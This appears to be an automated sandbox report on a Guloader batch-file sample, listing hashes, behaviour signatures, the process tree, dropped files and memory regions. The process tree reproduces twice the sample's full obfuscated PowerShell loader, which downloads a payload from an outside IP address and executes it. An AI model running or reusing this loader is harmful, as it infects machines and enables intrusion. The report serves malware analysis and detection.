Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-05-2024 16:26

General

  • Target

    SYN-M021012010530.bat

  • Size

    6KB

  • MD5

    01553a7a340cc74a5f1773cae16cebe6

  • SHA1

    e7712f5d585e5fe9ac92922b55a79a16540aa7e1

  • SHA256

    99f975270c9c758a4ee7600eb37843e77510a636759ee656c4953268ef8b9d88

  • SHA512

    c6135a2a62a65ec8d22cee340b095dedb1e0c260d7c506bd35167415fe75ebb66dc83cf2d2159b33677012255b9bdc41969fd7c2648c477858c0ea8c588de894

  • SSDEEP

    96:b7ge1uD/1+adiF2aYjsAhmbo/H5lAiDYShyrO0MuzC1jYRGbsz39qdUt:Xu+OiF2aYjsAhFFYfO0TzC1jY8bjY

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Program crash 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3576
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SYN-M021012010530.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1460
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -windowstyle hidden "$Untrickable='S';$Untrickable+='ubs';$Untrickable+='tri';$Outsped = 1;$Untrickable+='ng';Function Transfused($vauxhallian){$Gazi=$vauxhallian.Length-$Outsped;For( $Mustees=5;$Mustees -lt $Gazi;$Mustees+=6){$Hjarn234+=$vauxhallian.$Untrickable.Invoke( $Mustees, $Outsped);}$Hjarn234;}function Boarhound($Soothing){ . ($Kundebrevs) ($Soothing);}$Narcissisms85=Transfused 'KolonMKou aoDiamezNedt,iUnc elTournlVrelsaSkovm/ Boar5Avi p.Frihe0Ben.o Erhve(CatecWFedtpiGormanIna vd phaeoHov,dwBi lesAmazo M,nogN Eur,T,orsk Rel,k1Oblig0Fro,t. Rkke0 Anke;A bej TjeneWBrugsilistfnMobbe6Prere4.ilkn;Sli,d TvindxFag i6No ni4Fejlm;Udfor Pr,prTegnmv .usb:Indus1Restf2s.edm1Snden. Shee0Matem),liep RepouG.yanaeGravec ntrik C.acoHol,p/Cr.di2Cross0Maski1Visit0Ne.sk0Forbe1Tilgo0Teuto1 Isfl MaideFRedraiGrenarBlankeUnclefTilnro MedixUdvel/bullw1calli2D gra1Kanta.Nedst0P,odl ';$Sankes=Transfused 'AfdisUObli.sSemi.egrusvrEnerg- F meASvinggCanadeBemr,n funktHande ';$Ejendomshandlernes=Transfused ' HemohBaadstpresutApartpE asc: Elli/ Sign/Uhens1Ufiks9Phala4Cilif.Stats5 Valu9 Outs. B ev3atona0Middl. C,nt6Avnet/SmlerBCe suaPaleon BeskkOpsloeA soraKvindaMorannFagkldUnam,e NonirS alsn,ommueFuril.Hoft.rRygsvaSimulrA yth ';$Moneymakers=Transfused 'Defea>M.scl ';$Kundebrevs=Transfused ' EgunitreleeBoatsxSalme ';$Klistermrkers108='Decasualised';$Tipsy = Transfused 'Spin,eOroloc ,orsh.fdmpoBroom Finge%Canama.artopJunaspVickidT.mpaaKok,stCut,faS,ort%val.o\AnaloCSnapshPatrueMvedeeDroscp arrieU,pdrr Syst.AudioMd.nzieBrnehlTrueh Fej,&Udska&ub,tv Despee DigrcPrim,hUds aoMisco cimnetB owz ';Boarhound (Transfused ' egej$ mpesgEnvisl becaoEurovbBlrenacephilN opl: HenrTrammez Beara BrisrAntrkd Skino an.lmKlyves Dos,=Pro o( Ind.cB.wstmKlagedThirt ene,i/Kunstcunfor Bratt$FlitsTR gati BartpFjerdsResowyProte) Liz. ');Boarhound (Transfused 'U der$Byzong F,oclTeinooPedanbTmreraUnfr lAfson:B,tchAsi,shdCajepmFulwai Weekr Dif,aAfd llLoyalsRabbiuAndennPoresiFrossfdi.emo ummr .venmf rhaeHistorsul,e=Mungo$ OvarEStru,j UnnoeEksp,nRutefdAngeroCold.m undssReoxih U ruaStersnUngabdLyskolGiorgeDry,drTextunn,ncoeUnsy,sApyre.IndivsOrganpSi,delBilveiImpretMuli,(Skala$An.isMStopkoPl,cenDrke,e Aim.ySor emT lweaHendek NondeCys.orVent sLandk)Kdfar ');$Ejendomshandlernes=$Admiralsuniformer[0];$Atomforsgsstationernes= (Transfused 'Bifen$TroldgCholelBalthoS derbSenneaTakkelStrim:BarbaG Ban uRt romIntermbladdiinflafFedtsa SkilbNagger utoci pedak,raugkKil meLinearInela=GraniNMohabeBro,ewOverr-OrkanOSacrib tu.ijD.rryeSnapscOverstStumb OrmegS,nganyB.ndesSc,retsa.ire YounmTight.riddlNPreage Pan.t A es.DiftoWAscene Pi abIsbaaCKobbelSti.eiBac.leAfstbnOffert');$Atomforsgsstationernes+=$Tzardoms[1];Boarhound ($Atomforsgsstationernes);Boarhound (Transfused ' alis$SkibsGRetouuUplanm IndemFisteiInducf A nuaAnswebEsterr t,aciFor.jkAkkumkSwadle VelsrCop e.MurseHNo,saeDeseraVare.d AadseAgurkrFamilsrecan[Haand$SveskSaktieaCap,wnAfvbnkNonareAntigsSlu,c]Heime=Afkli$InterNButtoa dobbrDiscocPimariAn,res hetesSldnii DestsUdstrmsememssenio8Milkg5 Assi ');$Unheavenly=Transfused 'Nords$ForskGNon ruObtenmGokarmMultiiChirofPr,ssa ReplbKarrer Di.ciTailbk KalkkFri.re ,ibirReach.BarbeD.trioo reswSuggen Bolil SpheoSenila Ned,dTolstFStorei NytelGreene K tc(Fader$Spri EkonsejInt,reTi ocnNervodOxy eo UnobmDepers tilvh,paltaDegelnTy.etd TerrlLampeeNonexrJonatnDemodeBlou sFea l,camo $U,derTplagiaUdef.i,axmatKerne)P.nin ';$Tait=$Tzardoms[0];Boarhound (Transfused 'Brste$ Forhg De ilDe teoPrecobPalmeaSelidlaf.oe:S.rfeAPre.anachettSandpi Lab s LudeeSelvarDi.siaDoxyc3Block8Fin,s=b,rta( LiprT.nnebeD ambsflappt.lapp-InexpP KeanaVandpt Fo hhLegit ,lokp$ HagiTDokh aFr,teiAlfaqtUunds)tup.l ');while (!$Antisera38) {Boarhound (Transfused 'efter$RettegSvinglBulgaoMedinbRealta,eindlCider: l,teJBak,euDagspbKam,riUafstl hydea BehonG.anatd bfrlKittsy Bedr=Facet$EarlitTric,r Fejlu EndoeMy,me ') ;Boarhound $Unheavenly;Boarhound (Transfused 'StillSunde tGrovva U derK,miktbrems-ArkivS Forml Holoe MalteTordepCorpo Nonpu4 .ran ');Boarhound (Transfused 'E,end$Tolvtg MatelUnderoDemulbSolana Falcl Boli:Rom,nA .lenn n,nctP ntai,atansNasaleinhumrAldosa Sprd3Garvn8Lbetr=alexi(Daf.oTOrec,eHis.osSte.ot Unde-MaaneP,ateraE.obrtUmusih niti Drif$GenerT VomeaBge,ji Hjdetsa ro)Trykn ') ;Boarhound (Transfused 'Meldb$jagatgSadellOerkeoStillbTidssaRa,dalTurki:MoonsBEquisoMatior KlardRe.seeEstralPri.taStrafi GaesspensieResidsKom iaGrudgu Arb,cC,none Moi sIndhe=udski$BegregHaikwlKinkhoObf,sbStersaUv.erlArcad:DemanH Ko.pgEmanattekstnFragii Rentn Acing.vampsdebi.+Sr,il+Logge%Sorti$SpdbaA .ppedTvrsumRadiuiTrisurOrblea inanlAgr.ssEffigu EvolnKursiiSkrivfPlyn,opublir ndhmWispieUnparrFiske.WavabcV,rsloSommeuAdfr.n FanetUnmir ') ;$Ejendomshandlernes=$Admiralsuniformer[$Bordelaisesauces];}$Wardless=330494;$Dgnprven=29148;Boarhound (Transfused 'Zo fy$Dambrg NaselAfbilo tr abPlenaaAfganlappos:IndorXStjssiCrotavFl,tn Torva=Azu.e SkaltG Sli,ei.dfatAnaly-Ash,aCCyanko MaitnPrototS,icieErsarnCu,ritNumba Ger,f$ F.lmTEp raaPediaiteddytskure ');Boarhound (Transfused 'Putti$Resergcroatl Dd aoFa,gebBrnehaR,ttilPic,o: F,rmFskrkrrP.rnoa CentgAandst DonnvS.abeo ussbgBunkenDrivbeUndoin Psyc3Dia,r7herr. Ed.ta=Vensk Illud[PresuSB.msey DilesSa kttTykkee AbscmIdris.NoncoCkarbooBla jnManeuvFrilaePoikirAden.t ,roc]Star :Afkas:RenomF Galvr.nfamoUnco m RevuB AppraCondosJubileSalis6Kolle4Pseu,SUndertSttedrIl.egiO,sknnPl.stg .bev(,laze$FikssX.ebraiP,litvTrans)Vedho ');Boarhound (Transfused 'Op,id$Sl,mbgRefuslSokk.o .aseb.ongoaHobn,l,imax:impecW,ystoaAbsorhCa lic Besto allanFeeb,d SympaUnsac Kurto= Siru Aftal[ TndrS,lyssy Di es Br,ttUnmone dfalm,rels.U obtT,unstesagn,xudrykt .dgi.,emonEAffejnTredjcReforo MahsdBr deiMorganPlasmgGenfr]Chin,: Thru:.onisAReclaS Sa,lC ,ordIfljfoIThres.FremsGAntileU afftRvekaSTrindtEnarcrAttraiAm,ulnFinnegLesfo(Skele$culleF G.orr utlaaGteskg Sikst MirtvSluknoLandggDumpenCalcie helbnNyma,3Gelda7Udbud)ki,an ');Boarhound (Transfused 'Marke$ UnargTrilil AntaosddonbFloosaBactrl.nmar:JenhaE rremk,ogoms Septp jon.o wla r.odretSaltkp,restrVmme.iFluessRundt=Un dr$Pr.esW.rbejaHobomhNeurocBiledoEntomnHyalodPunktaIn,bo.Glazis S ubuIn,erbVers.sHunnetStvnerKodili prehnTrac,gRekvi( Udvi$ BrutWRetr a utvorCo.ladUdskilStutte aaresD plisReple,Begra$ Pro,D AltegTredjn AppopStonyrSl unvAcroreCautin ,lun)mdepl ');Boarhound $Eksportpris;"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2504
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cheeper.Mel && echo t"
          4⤵
            PID:1724
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Untrickable='S';$Untrickable+='ubs';$Untrickable+='tri';$Outsped = 1;$Untrickable+='ng';Function Transfused($vauxhallian){$Gazi=$vauxhallian.Length-$Outsped;For( $Mustees=5;$Mustees -lt $Gazi;$Mustees+=6){$Hjarn234+=$vauxhallian.$Untrickable.Invoke( $Mustees, $Outsped);}$Hjarn234;}function Boarhound($Soothing){ . ($Kundebrevs) ($Soothing);}$Narcissisms85=Transfused 'KolonMKou aoDiamezNedt,iUnc elTournlVrelsaSkovm/ Boar5Avi p.Frihe0Ben.o Erhve(CatecWFedtpiGormanIna vd phaeoHov,dwBi lesAmazo M,nogN Eur,T,orsk Rel,k1Oblig0Fro,t. Rkke0 Anke;A bej TjeneWBrugsilistfnMobbe6Prere4.ilkn;Sli,d TvindxFag i6No ni4Fejlm;Udfor Pr,prTegnmv .usb:Indus1Restf2s.edm1Snden. Shee0Matem),liep RepouG.yanaeGravec ntrik C.acoHol,p/Cr.di2Cross0Maski1Visit0Ne.sk0Forbe1Tilgo0Teuto1 Isfl MaideFRedraiGrenarBlankeUnclefTilnro MedixUdvel/bullw1calli2D gra1Kanta.Nedst0P,odl ';$Sankes=Transfused 'AfdisUObli.sSemi.egrusvrEnerg- F meASvinggCanadeBemr,n funktHande ';$Ejendomshandlernes=Transfused ' HemohBaadstpresutApartpE asc: Elli/ Sign/Uhens1Ufiks9Phala4Cilif.Stats5 Valu9 Outs. B ev3atona0Middl. C,nt6Avnet/SmlerBCe suaPaleon BeskkOpsloeA soraKvindaMorannFagkldUnam,e NonirS alsn,ommueFuril.Hoft.rRygsvaSimulrA yth ';$Moneymakers=Transfused 'Defea>M.scl ';$Kundebrevs=Transfused ' EgunitreleeBoatsxSalme ';$Klistermrkers108='Decasualised';$Tipsy = Transfused 'Spin,eOroloc ,orsh.fdmpoBroom Finge%Canama.artopJunaspVickidT.mpaaKok,stCut,faS,ort%val.o\AnaloCSnapshPatrueMvedeeDroscp arrieU,pdrr Syst.AudioMd.nzieBrnehlTrueh Fej,&Udska&ub,tv Despee DigrcPrim,hUds aoMisco cimnetB owz ';Boarhound (Transfused ' egej$ mpesgEnvisl becaoEurovbBlrenacephilN opl: HenrTrammez Beara BrisrAntrkd Skino an.lmKlyves Dos,=Pro o( Ind.cB.wstmKlagedThirt ene,i/Kunstcunfor Bratt$FlitsTR gati BartpFjerdsResowyProte) Liz. ');Boarhound (Transfused 'U der$Byzong F,oclTeinooPedanbTmreraUnfr lAfson:B,tchAsi,shdCajepmFulwai Weekr Dif,aAfd llLoyalsRabbiuAndennPoresiFrossfdi.emo ummr .venmf rhaeHistorsul,e=Mungo$ OvarEStru,j UnnoeEksp,nRutefdAngeroCold.m undssReoxih U ruaStersnUngabdLyskolGiorgeDry,drTextunn,ncoeUnsy,sApyre.IndivsOrganpSi,delBilveiImpretMuli,(Skala$An.isMStopkoPl,cenDrke,e Aim.ySor emT lweaHendek NondeCys.orVent sLandk)Kdfar ');$Ejendomshandlernes=$Admiralsuniformer[0];$Atomforsgsstationernes= (Transfused 'Bifen$TroldgCholelBalthoS derbSenneaTakkelStrim:BarbaG Ban uRt romIntermbladdiinflafFedtsa SkilbNagger utoci pedak,raugkKil meLinearInela=GraniNMohabeBro,ewOverr-OrkanOSacrib tu.ijD.rryeSnapscOverstStumb OrmegS,nganyB.ndesSc,retsa.ire YounmTight.riddlNPreage Pan.t A es.DiftoWAscene Pi abIsbaaCKobbelSti.eiBac.leAfstbnOffert');$Atomforsgsstationernes+=$Tzardoms[1];Boarhound ($Atomforsgsstationernes);Boarhound (Transfused ' alis$SkibsGRetouuUplanm IndemFisteiInducf A nuaAnswebEsterr t,aciFor.jkAkkumkSwadle VelsrCop e.MurseHNo,saeDeseraVare.d AadseAgurkrFamilsrecan[Haand$SveskSaktieaCap,wnAfvbnkNonareAntigsSlu,c]Heime=Afkli$InterNButtoa dobbrDiscocPimariAn,res hetesSldnii DestsUdstrmsememssenio8Milkg5 Assi ');$Unheavenly=Transfused 'Nords$ForskGNon ruObtenmGokarmMultiiChirofPr,ssa ReplbKarrer Di.ciTailbk KalkkFri.re ,ibirReach.BarbeD.trioo reswSuggen Bolil SpheoSenila Ned,dTolstFStorei NytelGreene K tc(Fader$Spri EkonsejInt,reTi ocnNervodOxy eo UnobmDepers tilvh,paltaDegelnTy.etd TerrlLampeeNonexrJonatnDemodeBlou sFea l,camo $U,derTplagiaUdef.i,axmatKerne)P.nin ';$Tait=$Tzardoms[0];Boarhound (Transfused 'Brste$ Forhg De ilDe teoPrecobPalmeaSelidlaf.oe:S.rfeAPre.anachettSandpi Lab s LudeeSelvarDi.siaDoxyc3Block8Fin,s=b,rta( LiprT.nnebeD ambsflappt.lapp-InexpP KeanaVandpt Fo hhLegit ,lokp$ HagiTDokh aFr,teiAlfaqtUunds)tup.l ');while (!$Antisera38) {Boarhound (Transfused 'efter$RettegSvinglBulgaoMedinbRealta,eindlCider: l,teJBak,euDagspbKam,riUafstl hydea BehonG.anatd bfrlKittsy Bedr=Facet$EarlitTric,r Fejlu EndoeMy,me ') ;Boarhound $Unheavenly;Boarhound (Transfused 'StillSunde tGrovva U derK,miktbrems-ArkivS Forml Holoe MalteTordepCorpo Nonpu4 .ran ');Boarhound (Transfused 'E,end$Tolvtg MatelUnderoDemulbSolana Falcl Boli:Rom,nA .lenn n,nctP ntai,atansNasaleinhumrAldosa Sprd3Garvn8Lbetr=alexi(Daf.oTOrec,eHis.osSte.ot Unde-MaaneP,ateraE.obrtUmusih niti Drif$GenerT VomeaBge,ji Hjdetsa ro)Trykn ') ;Boarhound (Transfused 'Meldb$jagatgSadellOerkeoStillbTidssaRa,dalTurki:MoonsBEquisoMatior KlardRe.seeEstralPri.taStrafi GaesspensieResidsKom iaGrudgu Arb,cC,none Moi sIndhe=udski$BegregHaikwlKinkhoObf,sbStersaUv.erlArcad:DemanH Ko.pgEmanattekstnFragii Rentn Acing.vampsdebi.+Sr,il+Logge%Sorti$SpdbaA .ppedTvrsumRadiuiTrisurOrblea inanlAgr.ssEffigu EvolnKursiiSkrivfPlyn,opublir ndhmWispieUnparrFiske.WavabcV,rsloSommeuAdfr.n FanetUnmir ') ;$Ejendomshandlernes=$Admiralsuniformer[$Bordelaisesauces];}$Wardless=330494;$Dgnprven=29148;Boarhound (Transfused 'Zo fy$Dambrg NaselAfbilo tr abPlenaaAfganlappos:IndorXStjssiCrotavFl,tn Torva=Azu.e SkaltG Sli,ei.dfatAnaly-Ash,aCCyanko MaitnPrototS,icieErsarnCu,ritNumba Ger,f$ F.lmTEp raaPediaiteddytskure ');Boarhound (Transfused 'Putti$Resergcroatl Dd aoFa,gebBrnehaR,ttilPic,o: F,rmFskrkrrP.rnoa CentgAandst DonnvS.abeo ussbgBunkenDrivbeUndoin Psyc3Dia,r7herr. Ed.ta=Vensk Illud[PresuSB.msey DilesSa kttTykkee AbscmIdris.NoncoCkarbooBla jnManeuvFrilaePoikirAden.t ,roc]Star :Afkas:RenomF Galvr.nfamoUnco m RevuB AppraCondosJubileSalis6Kolle4Pseu,SUndertSttedrIl.egiO,sknnPl.stg .bev(,laze$FikssX.ebraiP,litvTrans)Vedho ');Boarhound (Transfused 'Op,id$Sl,mbgRefuslSokk.o .aseb.ongoaHobn,l,imax:impecW,ystoaAbsorhCa lic Besto allanFeeb,d SympaUnsac Kurto= Siru Aftal[ TndrS,lyssy Di es Br,ttUnmone dfalm,rels.U obtT,unstesagn,xudrykt .dgi.,emonEAffejnTredjcReforo MahsdBr deiMorganPlasmgGenfr]Chin,: Thru:.onisAReclaS Sa,lC ,ordIfljfoIThres.FremsGAntileU afftRvekaSTrindtEnarcrAttraiAm,ulnFinnegLesfo(Skele$culleF G.orr utlaaGteskg Sikst MirtvSluknoLandggDumpenCalcie helbnNyma,3Gelda7Udbud)ki,an ');Boarhound (Transfused 'Marke$ UnargTrilil AntaosddonbFloosaBactrl.nmar:JenhaE rremk,ogoms Septp jon.o wla r.odretSaltkp,restrVmme.iFluessRundt=Un dr$Pr.esW.rbejaHobomhNeurocBiledoEntomnHyalodPunktaIn,bo.Glazis S ubuIn,erbVers.sHunnetStvnerKodili prehnTrac,gRekvi( Udvi$ BrutWRetr a utvorCo.ladUdskilStutte aaresD plisReple,Begra$ Pro,D AltegTredjn AppopStonyrSl unvAcroreCautin ,lun)mdepl ');Boarhound $Eksportpris;"
            4⤵
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3036
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cheeper.Mel && echo t"
              5⤵
                PID:772
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                5⤵
                • Suspicious use of NtCreateThreadExHideFromDebugger
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:3272
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 236
                  6⤵
                  • Program crash
                  PID:1880
        • C:\Windows\SysWOW64\net.exe
          "C:\Windows\SysWOW64\net.exe"
          2⤵
            PID:2196
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3272 -ip 3272
          1⤵
            PID:3224

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vrhxris2.bah.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Roaming\Cheeper.Mel

            Filesize

            468KB

            MD5

            3ced6d4c368b3c146f505b8834acbbf5

            SHA1

            52aa294e59e4f7440ee0d9bd354ce5e34389607f

            SHA256

            83f9727eb2df307d1ced9de81d6f3ceec82f0d36bf7895dc2275d63eaa66789c

            SHA512

            9c3dea4f1b836a564b8bf650d04f9b14e034c4fa3dc04acb3114fd1d53e7fb2c765a6f4db7056e75d03f4037562b1ed0a5f4b358929a44c2b68f72e7df342c73

          • memory/2504-3-0x000001E8DB5F0000-0x000001E8DB612000-memory.dmp

            Filesize

            136KB

          • memory/2504-13-0x00007FFCEC070000-0x00007FFCECB31000-memory.dmp

            Filesize

            10.8MB

          • memory/2504-14-0x00007FFCEC070000-0x00007FFCECB31000-memory.dmp

            Filesize

            10.8MB

          • memory/2504-55-0x00007FFCEC070000-0x00007FFCECB31000-memory.dmp

            Filesize

            10.8MB

          • memory/2504-45-0x00007FFCEC070000-0x00007FFCECB31000-memory.dmp

            Filesize

            10.8MB

          • memory/2504-44-0x00007FFCEC073000-0x00007FFCEC075000-memory.dmp

            Filesize

            8KB

          • memory/2504-2-0x00007FFCEC073000-0x00007FFCEC075000-memory.dmp

            Filesize

            8KB

          • memory/3036-20-0x0000000005340000-0x0000000005968000-memory.dmp

            Filesize

            6.2MB

          • memory/3036-41-0x0000000008490000-0x0000000008A34000-memory.dmp

            Filesize

            5.6MB

          • memory/3036-24-0x0000000005AC0000-0x0000000005B26000-memory.dmp

            Filesize

            408KB

          • memory/3036-23-0x00000000059E0000-0x0000000005A46000-memory.dmp

            Filesize

            408KB

          • memory/3036-30-0x0000000005B30000-0x0000000005E84000-memory.dmp

            Filesize

            3.3MB

          • memory/3036-35-0x00000000060F0000-0x000000000610E000-memory.dmp

            Filesize

            120KB

          • memory/3036-36-0x0000000006120000-0x000000000616C000-memory.dmp

            Filesize

            304KB

          • memory/3036-37-0x0000000007860000-0x0000000007EDA000-memory.dmp

            Filesize

            6.5MB

          • memory/3036-38-0x0000000007230000-0x000000000724A000-memory.dmp

            Filesize

            104KB

          • memory/3036-39-0x00000000073F0000-0x0000000007486000-memory.dmp

            Filesize

            600KB

          • memory/3036-40-0x0000000007350000-0x0000000007372000-memory.dmp

            Filesize

            136KB

          • memory/3036-22-0x0000000005240000-0x0000000005262000-memory.dmp

            Filesize

            136KB

          • memory/3036-21-0x0000000075300000-0x0000000075AB0000-memory.dmp

            Filesize

            7.7MB

          • memory/3036-43-0x0000000008A40000-0x000000000E5EA000-memory.dmp

            Filesize

            91.7MB

          • memory/3036-19-0x0000000075300000-0x0000000075AB0000-memory.dmp

            Filesize

            7.7MB

          • memory/3036-18-0x00000000027B0000-0x00000000027E6000-memory.dmp

            Filesize

            216KB

          • memory/3036-48-0x0000000075300000-0x0000000075AB0000-memory.dmp

            Filesize

            7.7MB

          • memory/3036-47-0x000000007530E000-0x000000007530F000-memory.dmp

            Filesize

            4KB

          • memory/3036-49-0x0000000075300000-0x0000000075AB0000-memory.dmp

            Filesize

            7.7MB

          • memory/3036-52-0x0000000075300000-0x0000000075AB0000-memory.dmp

            Filesize

            7.7MB

          • memory/3036-17-0x000000007530E000-0x000000007530F000-memory.dmp

            Filesize

            4KB

          • memory/3272-51-0x0000000001000000-0x0000000006BAA000-memory.dmp

            Filesize

            91.7MB

          • memory/3272-61-0x0000000001000000-0x0000000006BAA000-memory.dmp

            Filesize

            91.7MB